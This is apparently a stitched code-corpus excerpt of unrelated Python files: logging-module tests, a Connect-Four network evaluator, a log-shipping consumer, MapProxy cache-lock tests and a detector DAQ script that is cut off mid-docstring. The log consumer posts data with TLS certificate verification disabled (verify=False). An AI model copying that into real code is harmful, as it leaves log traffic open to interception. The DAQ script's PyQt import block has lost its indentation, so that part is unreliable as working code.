            files = [f for f in os.listdir(dn) if f.startswith(fn)]
            print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
            print('The only matching files are: %s' % files, file=sys.stderr)
            for f in files:
                print('Contents of %s:' % f)
                path = os.path.join(dn, f)
                with open(path, 'r') as tf:
                    print(tf.read())
        self.assertTrue(found, msg=msg)

    def test_invalid(self):
        # Unknown 'when' specifiers must raise ValueError at construction.
        assertRaises = self.assertRaises
        assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
                     self.fn, 'X', delay=True)
        assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
                     self.fn, 'W', delay=True)
        assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
                     self.fn, 'W7', delay=True)

    def test_compute_rollover_daily_attime(self):
        # With atTime=12:00 UTC and currentTime=0 (epoch midnight), the first
        # rollover is at noon, and a query after noon lands at the next noon.
        currentTime = 0
        atTime = datetime.time(12, 0, 0)
        rh = logging.handlers.TimedRotatingFileHandler(
            self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
            atTime=atTime)
        try:
            actual = rh.computeRollover(currentTime)
            self.assertEqual(actual, currentTime + 12 * 60 * 60)
            actual = rh.computeRollover(currentTime + 13 * 60 * 60)
            self.assertEqual(actual, currentTime + 36 * 60 * 60)
        finally:
            rh.close()

    #@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
    def test_compute_rollover_weekly_attime(self):
        currentTime = int(time.time())
        today = currentTime - currentTime % 86400
        atTime = datetime.time(12, 0, 0)
        wday = time.gmtime(today).tm_wday
        for day in range(7):
            rh = logging.handlers.TimedRotatingFileHandler(
                self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
                atTime=atTime)
            try:
                if wday > day:
                    # The rollover day has already passed this week, so we
                    # go over into next week
                    expected = (7 - wday + day)
                else:
                    expected = (day - wday)
                # At this point expected is in days from now, convert to seconds
                expected *= 24 * 60 * 60
                # Add in the rollover time
                expected += 12 * 60 * 60
                # Add in adjustment for today
                expected += today
                actual = rh.computeRollover(today)
                if actual != expected:
                    print('failed in timezone: %d' % time.timezone)
                    print('local vars: %s' % locals())
                self.assertEqual(actual, expected)
                if day == wday:
                    # goes into following week
                    expected += 7 * 24 * 60 * 60
                actual = rh.computeRollover(today + 13 * 60 * 60)
                if actual != expected:
                    print('failed in timezone: %d' % time.timezone)
                    print('local vars: %s' % locals())
                self.assertEqual(actual, expected)
            finally:
                rh.close()
def secs(**kw):
    # Convert a timedelta spec (days=..., hours=...) into whole seconds.
    return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)

# Generate one test_compute_rollover_<when> method per rollover spec and
# attach it to TimedRotatingFileHandlerTest. `exp` is the expected number of
# seconds from the epoch until the first rollover.
for when, exp in (('S', 1),
                  ('M', 60),
                  ('H', 60 * 60),
                  ('D', 60 * 60 * 24),
                  ('MIDNIGHT', 60 * 60 * 24),
                  # current time (epoch start) is a Thursday, W0 means Monday
                  ('W0', secs(days=4, hours=24)),
                  ):
    # when/exp are bound as defaults to avoid the late-binding closure pitfall.
    def test_compute_rollover(self, when=when, exp=exp):
        rh = logging.handlers.TimedRotatingFileHandler(
            self.fn, when=when, interval=1, backupCount=0, utc=True)
        currentTime = 0.0
        actual = rh.computeRollover(currentTime)
        if exp != actual:
            # Failures occur on some systems for MIDNIGHT and W0.
            # Print detailed calculation for MIDNIGHT so we can try to see
            # what's going on
            if when == 'MIDNIGHT':
                try:
                    if rh.utc:
                        t = time.gmtime(currentTime)
                    else:
                        t = time.localtime(currentTime)
                    currentHour = t[3]
                    currentMinute = t[4]
                    currentSecond = t[5]
                    # r is the number of seconds left between now and midnight
                    r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
                                                       currentMinute) * 60 +
                                                      currentSecond)
                    result = currentTime + r
                    print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
                    print('currentHour: %s' % currentHour, file=sys.stderr)
                    print('currentMinute: %s' % currentMinute, file=sys.stderr)
                    print('currentSecond: %s' % currentSecond, file=sys.stderr)
                    print('r: %s' % r, file=sys.stderr)
                    print('result: %s' % result, file=sys.stderr)
                except Exception:
                    print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
        self.assertEqual(exp, actual)
        rh.close()
    setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
    """Windows-only: verifies NTEventLogHandler writes to the NT event log."""

    def test_basic(self):
        logtype = 'Application'
        elh = win32evtlog.OpenEventLog(None, logtype)
        num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
        try:
            h = logging.handlers.NTEventLogHandler('test_logging')
        except pywintypes.error as e:
            if e.winerror == 5:  # access denied
                raise unittest.SkipTest('Insufficient privileges to run test')
            raise
        r = logging.makeLogRecord({'msg': 'Test Log Message'})
        h.handle(r)
        h.close()
        # Now see if the event is recorded
        self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
        flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
                win32evtlog.EVENTLOG_SEQUENTIAL_READ
        found = False
        GO_BACK = 100
        events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
        for e in events:
            if e.SourceName != 'test_logging':
                continue
            msg = win32evtlogutil.SafeFormatMessage(e, logtype)
            if msg != 'Test Log Message\r\n':
                continue
            found = True
            break
        msg = 'Record not found in event log, went back %d records' % GO_BACK
        self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
    def test__all__(self):
        # Names deliberately excluded from logging.__all__.
        blacklist = {'logThreads', 'logMultiprocessing',
                     'logProcesses', 'currentframe',
                     'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
                     'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
                     'root', 'threading'}
        support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
    """Run every test class in this module under the default locale."""
    tests = [
        BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
        HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
        DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
        ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
        StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
        QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
        LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
        RotatingFileHandlerTest, LastResortTest, LogRecordTest,
        ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
        NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
        UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
        MiscTestCase
    ]
    # QueueListener only exists on builds with threading support.
    if hasattr(logging.handlers, 'QueueListener'):
        tests.append(QueueListenerTest)
    support.run_unittest(*tests)

if __name__ == "__main__":
    test_main()
|
evaluator_c4.py | #!/usr/bin/env python
import os.path
import torch
import numpy as np
from alpha_net_c4 import ConnectNet
from connect_board import board as cboard
import encoder_decoder_c4 as ed
import copy
from MCTS_c4 import UCT_search, do_decode_n_move_pieces, get_policy
import pickle
import torch.multiprocessing as mp
import datetime
import logging
logging.basicConfig(format='%(asctime)s [%(levelname)s]: %(message)s', \
datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.INFO)
logger = logging.getLogger(__file__)
def save_as_pickle(filename, data):
    """Serialize *data* with pickle into ./evaluator_data/<filename>."""
    target_path = os.path.join("./evaluator_data/", filename)
    with open(target_path, 'wb') as sink:
        pickle.dump(data, sink)
def load_pickle(filename):
    """Deserialize and return the object stored in ./evaluator_data/<filename>."""
    source_path = os.path.join("./evaluator_data/", filename)
    with open(source_path, 'rb') as source:
        return pickle.load(source)
class arena():
    """Plays head-to-head evaluation games between two ConnectNet models."""

    def __init__(self, current_cnet, best_cnet):
        # current_cnet: the freshly trained net; best_cnet: reigning champion.
        self.current = current_cnet
        self.best = best_cnet

    def play_round(self):
        """Play one full game; return (winner_label_or_None, game_dataset)."""
        logger.info("Starting game round...")
        # Randomly assign colors so neither net always moves first.
        if np.random.uniform(0, 1) <= 0.5:
            white = self.current; black = self.best; w = "current"; b = "best"
        else:
            white = self.best; black = self.current; w = "best"; b = "current"
        current_board = cboard()
        checkmate = False
        dataset = []
        value = 0
        t = 0.1  # low MCTS temperature => near-greedy move selection
        while not checkmate and current_board.actions() != []:
            dataset.append(copy.deepcopy(ed.encode_board(current_board)))
            print(""); print(current_board.current_board)
            # player 0 moves as white, player 1 as black; 777 MCTS simulations.
            if current_board.player == 0:
                root = UCT_search(current_board, 777, white, t)
                policy = get_policy(root, t); print("Policy: ", policy, "white = %s" % (str(w)))
            elif current_board.player == 1:
                root = UCT_search(current_board, 777, black, t)
                policy = get_policy(root, t); print("Policy: ", policy, "black = %s" % (str(b)))
            current_board = do_decode_n_move_pieces(current_board,\
                            np.random.choice(np.array([0,1,2,3,4,5,6]), \
                                             p = policy))  # decode move and move piece(s)
            if current_board.check_winner() == True:  # someone wins
                if current_board.player == 0:  # black wins
                    value = -1
                elif current_board.player == 1:  # white wins
                    value = 1
                checkmate = True
        dataset.append(ed.encode_board(current_board))
        if value == -1:
            dataset.append(f"{b} as black wins")
            return b, dataset
        elif value == 1:
            dataset.append(f"{w} as white wins")
            return w, dataset
        else:
            # Draw (board full with no winner).
            dataset.append("Nobody wins")
            return None, dataset

    def evaluate(self, num_games, cpu):
        """Play num_games rounds, pickling each game plus this CPU's win stats."""
        current_wins = 0
        logger.info("[CPU %d]: Starting games..." % cpu)
        for i in range(num_games):
            with torch.no_grad():
                winner, dataset = self.play_round(); print("%s wins!" % winner)
            if winner == "current":
                current_wins += 1
            save_as_pickle("evaluate_net_dataset_cpu%i_%i_%s_%s" % (cpu,i,datetime.datetime.today().strftime("%Y-%m-%d"),\
                                                                    str(winner)),dataset)
        print("Current_net wins ratio: %.5f" % (current_wins/num_games))
        # NOTE(review): the key says "best_win_ratio" but the value stored is
        # the CURRENT net's win ratio -- confirm downstream readers expect this.
        save_as_pickle("wins_cpu_%i" % (cpu),\
                       {"best_win_ratio": current_wins/num_games, "num_games":num_games})
        logger.info("[CPU %d]: Finished arena games!" % cpu)
def fork_process(arena_obj, num_games, cpu):  # make arena picklable
    # Module-level wrapper so the evaluation call can be used as a
    # multiprocessing target (bound methods are not picklable under "spawn").
    arena_obj.evaluate(num_games, cpu)
def evaluate_nets(args, iteration_1, iteration_2):
    """Pit the net from iteration_2 ("current") against iteration_1 ("best").

    Loads both checkpoints from ./model_data/, runs arena games (optionally
    across multiple processes), and returns the iteration number of the
    winner: iteration_2 if the current net's win ratio is >= 0.55, else
    iteration_1.

    NOTE(review): if args.MCTS_num_processes < 1, neither branch runs and the
    function implicitly returns None -- callers should guard against that.
    """
    logger.info("Loading nets...")
    current_net = "%s_iter%d.pth.tar" % (args.neural_net_name, iteration_2)
    best_net = "%s_iter%d.pth.tar" % (args.neural_net_name, iteration_1)
    current_net_filename = os.path.join("./model_data/", current_net)
    best_net_filename = os.path.join("./model_data/", best_net)
    logger.info("Current net: %s" % current_net)
    logger.info("Previous (Best) net: %s" % best_net)

    current_cnet = ConnectNet()
    best_cnet = ConnectNet()
    if torch.cuda.is_available():
        current_cnet.cuda()
        best_cnet.cuda()

    # Ensure the output directory for per-CPU win statistics exists.
    if not os.path.isdir("./evaluator_data/"):
        os.mkdir("evaluator_data")

    def _prepare(net, filename):
        # Put net in eval mode and load its checkpoint weights.
        net.eval()
        checkpoint = torch.load(filename)
        net.load_state_dict(checkpoint['state_dict'])

    if args.MCTS_num_processes > 1:
        mp.set_start_method("spawn", force=True)
        current_cnet.share_memory()
        best_cnet.share_memory()
        _prepare(current_cnet, current_net_filename)
        _prepare(best_cnet, best_net_filename)

        # Cap the number of worker processes at the number of CPUs.
        if args.MCTS_num_processes > mp.cpu_count():
            num_processes = mp.cpu_count()
            logger.info("Required number of processes exceed number of CPUs! Setting MCTS_num_processes to %d" % num_processes)
        else:
            num_processes = args.MCTS_num_processes

        logger.info("Spawning %d processes..." % num_processes)
        processes = []
        with torch.no_grad():
            for i in range(num_processes):
                p = mp.Process(target=fork_process,
                               args=(arena(current_cnet, best_cnet), args.num_evaluator_games, i))
                p.start()
                processes.append(p)
            for p in processes:
                p.join()

        # Average the per-process win ratios written by arena.evaluate().
        wins_ratio = 0.0
        for i in range(num_processes):
            stats = load_pickle("wins_cpu_%i" % (i))
            wins_ratio += stats['best_win_ratio']
        wins_ratio /= num_processes
        return iteration_2 if wins_ratio >= 0.55 else iteration_1
    elif args.MCTS_num_processes == 1:
        _prepare(current_cnet, current_net_filename)
        _prepare(best_cnet, best_net_filename)
        arena1 = arena(current_cnet=current_cnet, best_cnet=best_cnet)
        arena1.evaluate(num_games=args.num_evaluator_games, cpu=0)
        stats = load_pickle("wins_cpu_%i" % (0))
        # BUG FIX: load_pickle returns a plain dict, so the win ratio must be
        # read with item access ([...]), not attribute access -- the original
        # `stats.best_win_ratio` raised AttributeError on this path.
        return iteration_2 if stats['best_win_ratio'] >= 0.55 else iteration_1
consumer.py | import logging
import socket
import threading
from Queue import Queue, Full, Empty
import requests
import time
from dnif.exception import DnifException
class Consumer(object):
    """Abstract base for consumers that ship log payloads to an endpoint.

    NOTE(review): the subclasses in this module implement start(daemon=...)
    and stop(force=...); the `data` parameter on start/stop here looks like a
    copy-paste from send() -- confirm before relying on these signatures.
    """

    def start(self, data, **kwargs):
        # Begin the (background) upload machinery.
        raise NotImplementedError

    def stop(self, data, **kwargs):
        # Stop uploading.
        raise NotImplementedError

    def send(self, data):
        # Enqueue/transmit a single payload.
        raise NotImplementedError
class AsyncBufferedConsumer(Consumer):
    """ (Abstract) Consumer that uploads logs asynchronously in the background . """

    def __init__(self, buffer_size=1024):
        """
        Initialize the Consumer
        :param buffer_size: Max number of pending payloads to hold (in memory).
            If the queue is full, further payloads will be dropped
        """
        self._queue = Queue(maxsize=buffer_size)
        self._logger = logging.getLogger('dnif.consumer.' + self.__class__.__name__)
        # Both flags start True so send() is a no-op until start() is called.
        self._stop = self._force_stop = True
        self._thread = None

    def start(self, daemon=False, **kwargs):
        """ Start uploading. Running in daemon mode could cause data loss!
        :param daemon: if this is true, background thread will stop automatically with program completion
            without the need to explicitly call stop()
        """
        # NOTE(review): Thread.isAlive() is the legacy spelling (removed in
        # Python 3.9); together with the `Queue` import this module targets
        # Python 2 -- confirm the supported interpreter version.
        if self._thread and self._thread.isAlive():
            raise DnifException('already running')
        self._stop = self._force_stop = False
        self._thread = threading.Thread(target=self.upload)
        self._thread.daemon = bool(daemon)
        self._thread.start()

    def stop(self, force=False, **kwargs):
        """ Stop uploading. Forcing stop could cause data loss!
        :param force: stops upload immediately, dropping any pending uploads
        """
        # Only sets flags; the background thread observes them in upload().
        self._stop = True
        self._force_stop = force

    def send(self, data):
        """ Send the data to the target endpoint.
        This method only queues the upload, the upload itself happens asynchronously in the background.
        :param data: Data to upload
        """
        if self._stop:
            # don't add to the worker thread's burden after stop has been signalled
            return
        data = self.validate(data)
        if not data:
            return
        try:
            # Non-blocking put: drop the payload rather than stall the caller.
            self._queue.put(data, block=False)
        except Full:
            self._logger.info('Dropping data because max buffer size reached: {0}'.format(data))

    def validate(self, data):
        """
        Validate the data packet, and return the validated packet
        :param data: the data packet to send
        """
        raise NotImplementedError

    def upload(self):
        """
        Actually upload (runs on the background thread).
        """
        raise NotImplementedError
class AsyncHttpConsumer(AsyncBufferedConsumer):
    """ Consumer that uploads logs to the specified endpoint using HTTP. """

    def __init__(self, url, buffer_size=1024, batch_size=100):
        """
        :param url: The target URL
        :param buffer_size: Max number of pending payloads to hold (in memory).
        :param batch_size: Max number of queued payloads drained per POST.
        """
        self._url = url
        self._timeout = 15  # seconds, per requests.post call
        self._batch_size = batch_size
        super(AsyncHttpConsumer, self).__init__(buffer_size)

    def _validate_unit(self, data):
        """ Validate that data does not contain nested JSON objects. Lists are allowed. """
        for key, value in data.items():
            if isinstance(value, dict):
                self._logger.info('Skipping sending data packet. Nested JSON objects are not allowed: {0}'.format(data))
                return False
        return True

    def validate(self, data):
        # Normalize to a list of flat dicts; invalid units are dropped.
        if not isinstance(data, (dict, list, tuple)):
            self._logger.info('Skipping sending data packet. Data must be list/dict: {0}'.format(data))
            return None
        if isinstance(data, dict):
            data = [data]
        final = []
        for d in data:
            if self._validate_unit(d):
                final.append(d)
        return final

    def upload(self):
        # Background loop: drain up to batch_size items, POST them as JSON,
        # and exit when stopped (or immediately when force-stopped).
        while not self._force_stop:
            contents = []
            try:
                for i in range(self._batch_size):
                    data = self._queue.get_nowait()
                    if isinstance(data, list):
                        contents.extend(data)
                    else:
                        contents.append(data)
            except Empty:
                pass
            if not contents:
                if self._stop:
                    # loop's primary exit condition
                    break
                time.sleep(1)
            else:
                # check force stop flag again before making request
                if self._force_stop:
                    break
                try:
                    # SECURITY NOTE(review): verify=False disables TLS
                    # certificate verification -- confirm this is intended.
                    resp = requests.post(self._url, json=contents, timeout=self._timeout, verify=False)
                except Exception as ex:
                    self._logger.info('Error uploading log: {0}'.format(ex))
        self._logger.info('Background uploader stopped.')
class AsyncUDPConsumer(AsyncBufferedConsumer):
    """ Consumer that uploads logs to the specified endpoint using UDP """

    def __init__(self, target_ip, target_port, buffer_size=1024):
        """
        Initialize
        :param target_ip: The target UDP ip
        :param target_port: The target UDP port
        :param buffer_size: Max number of pending payloads to hold (in memory).
        """
        self._target_ip = target_ip
        self._target_port = target_port
        super(AsyncUDPConsumer, self).__init__(buffer_size)

    def validate(self, data):
        # `unicode` confirms this module is Python 2; UDP payloads must be text.
        if isinstance(data, (str, unicode)):
            return data
        else:
            self._logger.info('Skipping sending data packet. Expected str/unicode: {0}'.format(data))
            return None

    def upload(self):
        # Background loop: blocking 1s poll of the queue; each message is sent
        # as a single UDP datagram (fire-and-forget, errors only logged).
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        while not self._force_stop:
            try:
                message = self._queue.get(block=True, timeout=1)
                # check force stopped flag again before making request
                if self._force_stop:
                    break
                try:
                    sock.sendto(message, (self._target_ip, self._target_port))
                except Exception as ex:
                    self._logger.info('Error uploading log: {0}'.format(ex))
            except Empty:
                if self._stop:
                    break  # loop's primary exit condition
        sock.close()
        self._logger.info('Background uploader stopped.')
|
test_seed_cachelock.py | # This file is part of the MapProxy project.
# Copyright (C) 2012 Omniscale <http://omniscale.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
import time
import sys
import pytest
from mapproxy.seed.cachelock import CacheLocker, CacheLockedError
@pytest.mark.skipif(sys.platform == "win32", reason="test not supported for Windows")
class TestCacheLock(object):
    """Exercises CacheLocker's file-based cache locks across processes."""

    @pytest.fixture
    def lock_file(self, tmpdir):
        # Per-test lock file path inside pytest's tmp directory.
        return (tmpdir / "lock").strpath

    def test_free_lock(self, lock_file):
        # An uncontended lock can be acquired immediately.
        locker = CacheLocker(lock_file)
        with locker.lock("foo"):
            assert True

    def test_locked_by_process_no_block(self, lock_file):
        # A child process holds "foo"; no_block must raise CacheLockedError
        # for "foo" but still allow the unrelated "bar" lock.
        proc_is_locked = multiprocessing.Event()

        def lock():
            locker = CacheLocker(lock_file)
            with locker.lock("foo"):
                proc_is_locked.set()
                time.sleep(10)

        p = multiprocessing.Process(target=lock)
        p.start()
        # wait for process to start
        proc_is_locked.wait()

        locker = CacheLocker(lock_file)
        # test unlocked bar
        with locker.lock("bar", no_block=True):
            assert True
        # test locked foo
        try:
            with locker.lock("foo", no_block=True):
                assert False
        except CacheLockedError:
            pass
        finally:
            p.terminate()
            p.join()

    def test_locked_by_process_waiting(self, lock_file):
        # With no_block=False the lock call must poll until the child
        # releases "foo" (~0.1s), so the elapsed time exceeds 0.1s.
        proc_is_locked = multiprocessing.Event()

        def lock():
            locker = CacheLocker(lock_file)
            with locker.lock("foo"):
                proc_is_locked.set()
                time.sleep(.1)

        p = multiprocessing.Process(target=lock)
        start_time = time.time()
        p.start()
        # wait for process to start
        proc_is_locked.wait()

        locker = CacheLocker(lock_file, polltime=0.02)
        try:
            with locker.lock("foo", no_block=False):
                diff = time.time() - start_time
                assert diff > 0.1
        finally:
            p.terminate()
            p.join()
|
cryoDaq.py | #!/usr/bin/env python3
#-----------------------------------------------------------------------------
# Title : cryo DAQ top module (based on ePix HR readout)
#-----------------------------------------------------------------------------
# File : cryoDAQ.py evolved from evalBoard.py
# Created : 2018-06-12
# Last update: 2018-06-12
#-----------------------------------------------------------------------------
# Description:
# Rogue interface to cryo ASIC based on ePix HR boards
#-----------------------------------------------------------------------------
# This file is part of the rogue_example software. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the rogue_example software, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import setupLibPaths
import pyrogue as pr
import pyrogue.utilities.prbs
import pyrogue.utilities.fileio
import pyrogue.interfaces.simulation
import pyrogue.gui
import rogue.hardware.pgp
import rogue.protocols
import surf
import surf.axi
import surf.protocols.ssi
from XilinxKcu1500Pgp3.XilinxKcu1500Pgp3 import *
import threading
import signal
import atexit
import yaml
import time
import argparse
import sys
#import testBridge
import ePixViewer as vi
import ePixFpga as fpga
try:
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
except ImportError:
from PyQt4.QtCore import *
from PyQt4.QtGui import *
# ---------------------------------------------------------------------------
# Command-line interface
# ---------------------------------------------------------------------------
parser = argparse.ArgumentParser()


def argBool(s):
    """Interpret a command-line string as a boolean flag."""
    return s.lower() in ['true', 't', 'yes', '1']


# The PCIe card type is the only mandatory argument.
parser.add_argument(
    "--type",
    type=str,
    required=True,
    help="define the PCIe card type (either pgp-gen3 or kcu1500)",
)
parser.add_argument(
    "--start_gui",
    type=argBool,
    required=False,
    default=True,
    help="true to show gui",
)
parser.add_argument(
    "--viewer",
    type=argBool,
    required=False,
    default=True,
    help="Start viewer",
)
parser.add_argument(
    "--verbose",
    type=argBool,
    required=False,
    default=False,
    help="true for verbose printout",
)

# Parse everything up front; the rest of the script only reads `args`.
args = parser.parse_args()
#############################################
START_VIEWER = args.viewer  # gates the online viewer window created at the bottom of the script
print(args.viewer)
#############################################
# Add PGP virtual channels.
# Every branch below builds the same set of stream endpoints
# (pgpL0Vc0..pgpL0Vc3, pgpL2Vc0, pgpL3Vc0) on a different transport,
# selected by the --type argument.
if ( args.type == 'pgp-gen3' ):
    # Create the PGP interfaces for ePix hr camera
    pgpL0Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,0) # Data & cmds
    pgpL0Vc1 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,1) # Registers for ePix board
    pgpL0Vc2 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,2) # PseudoScope
    pgpL0Vc3 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,3) # Monitoring (Slow ADC)
    #pgpL1Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',0,0) # Data (when using all four lanes it should be swapped back with L0)
    pgpL2Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',2,0) # Data
    pgpL3Vc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',3,0) # Data
    print("")
    print("PGP Card Version: %x" % (pgpL0Vc0.getInfo().version))
elif ( args.type == 'kcu1500' ):
    # Create the PGP interfaces for ePix hr camera
    # DMA destination = (lane * 32) + virtual channel.
    pgpL0Vc0 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+0, True) # Data & cmds
    pgpL0Vc1 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+1, True) # Registers for ePix board
    pgpL0Vc2 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+2, True) # PseudoScope
    pgpL0Vc3 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(0*32)+3, True) # Monitoring (Slow ADC)
    #pgpL1Vc0 = rogue.hardware.data.DataCard('/dev/datadev_0',(0*32)+0) # Data (when using all four lanes it should be swapped back with L0)
    pgpL2Vc0 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(2*32)+0, True) # Data
    pgpL3Vc0 = rogue.hardware.axi.AxiStreamDma('/dev/datadev_0',(3*32)+0, True) # Data
elif ( args.type == 'SIM' ):
    # Firmware-simulation mode: talk to a local TCP bridge instead of hardware.
    # Port layout: simPort + 34*lane + 2*vc — TODO confirm against the sim setup.
    print('Sim mode')
    simPort = 11000
    rogue.Logging.setFilter('pyrogue.SrpV3', rogue.Logging.Debug)
    pgpL0Vc0 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*0) # VC0
    pgpL0Vc1 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*1) # VC1
    pgpL0Vc2 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*2) # VC2
    pgpL0Vc3 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*0)+2*3) # VC3
    pgpL2Vc0 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*2)+2*0) # L2VC0
    pgpL3Vc0 = rogue.interfaces.stream.TcpClient('localhost',simPort+(34*3)+2*0) # L3VC0
    #pgpL0Vc0 = pyrogue.interfaces.simulation.StreamSim(host='localhost', dest=0, uid=1, ssi=True)
    #pgpL0Vc1 = pyrogue.interfaces.simulation.StreamSim(host='localhost', dest=1, uid=1, ssi=True)
    #pgpL0Vc2 = pyrogue.interfaces.simulation.StreamSim(host='localhost', dest=2, uid=1, ssi=True)
    #pgpL0Vc3 = pyrogue.interfaces.simulation.StreamSim(host='localhost', dest=3, uid=1, ssi=True)
    #pgpL2Vc0 = pyrogue.interfaces.simulation.StreamSim(host='localhost', dest=0, uid=2, ssi=True)
    #pgpL3Vc0 = pyrogue.interfaces.simulation.StreamSim(host='localhost', dest=0, uid=3, ssi=True)
elif ( args.type == 'dataFile' ):
    # Offline mode: no pgp* endpoints exist, so every stream hookup below
    # is guarded with `args.type != 'dataFile'`.
    print("Bypassing hardware.")
else:
    raise ValueError("Invalid type (%s)" % (args.type) )

# Add data stream to file as channel 1 File writer
dataWriter = pyrogue.utilities.fileio.StreamWriter(name='dataWriter')
if ( args.type != 'dataFile' ):
    pyrogue.streamConnect(pgpL0Vc0, dataWriter.getChannel(0x1))
    pyrogue.streamConnect(pgpL0Vc2, dataWriter.getChannel(0x2))

# Command stream (software triggers) shares VC0 with the data.
cmd = rogue.protocols.srp.Cmd()
if ( args.type != 'dataFile' ):
    pyrogue.streamConnect(cmd, pgpL0Vc0)

# Create and Connect SRP to VC1 to send commands
srp = rogue.protocols.srp.SrpV3()
if ( args.type != 'dataFile' ):
    pyrogue.streamConnectBiDir(pgpL0Vc1,srp)
#############################################
# Microblaze console printout
#############################################
class MbDebug(rogue.interfaces.stream.Slave):
    """Stream slave that dumps Microblaze console frames to stdout when enabled."""

    def __init__(self):
        super().__init__()
        # Printing stays off until the operator flips this flag.
        self.enable = False

    def _acceptFrame(self, frame):
        if not self.enable:
            return
        payload = bytearray(frame.getPayload())
        frame.read(payload, 0)
        print('-------- Microblaze Console --------')
        print(payload.decode('utf-8'))
#######################################
# Custom run control
#######################################
class MyRunControl(pyrogue.RunControl):
    """Run controller that fires a ssiPrbsTx one-shot at the selected rate.

    NOTE(review): nothing in this file instantiates MyRunControl (the Board
    below adds a plain pyrogue.RunControl instead) — possibly dead code kept
    from the template this script evolved from; confirm before relying on it.
    """
    def __init__(self,name):
        pyrogue.RunControl.__init__(self,name, description='Run Controller ePix HR empty', rates={1:'1 Hz', 2:'2 Hz', 4:'4 Hz', 8:'8 Hz', 10:'10 Hz', 30:'30 Hz', 60:'60 Hz', 120:'120 Hz'})
        self._thread = None

    def _setRunState(self,dev,var,value,changed):
        # Start the generator thread when the state becomes 'Running';
        # join and discard it on any other state.
        if changed:
            if self.runState.get(read=False) == 'Running':
                self._thread = threading.Thread(target=self._run)
                self._thread.start()
            else:
                self._thread.join()
                self._thread = None

    def _run(self):
        self.runCount.set(0)
        self._last = int(time.time())
        while (self.runState.value() == 'Running'):
            # Invert the enum {rate: label} to look up the numeric rate (Hz).
            # NOTE(review): self._runRate is never assigned in this class —
            # presumably supplied by the pyrogue base class; verify, otherwise
            # this line raises AttributeError at run time.
            delay = 1.0 / ({value: key for key,value in self.runRate.enum.items()}[self._runRate])
            time.sleep(delay)
            self._root.ssiPrbsTx.oneShot()
            # NOTE(review): increments self._runCount but progress is reset via
            # self.runCount.set(0) above — looks inconsistent; confirm against
            # other rogue example run controllers.
            self._runCount += 1
            # Publish the counter at most once per second.
            if self._last != int(time.time()):
                self._last = int(time.time())
                self.runCount._updated()
##############################
# Set base
##############################
class Board(pyrogue.Root):
    """pyrogue root for the cryo ASIC: file writer, trigger command and devices.

    NOTE(review): reads the module-level `args` directly rather than taking the
    card type as a constructor parameter — fine for a script, but keep in mind
    if this class is ever reused elsewhere.
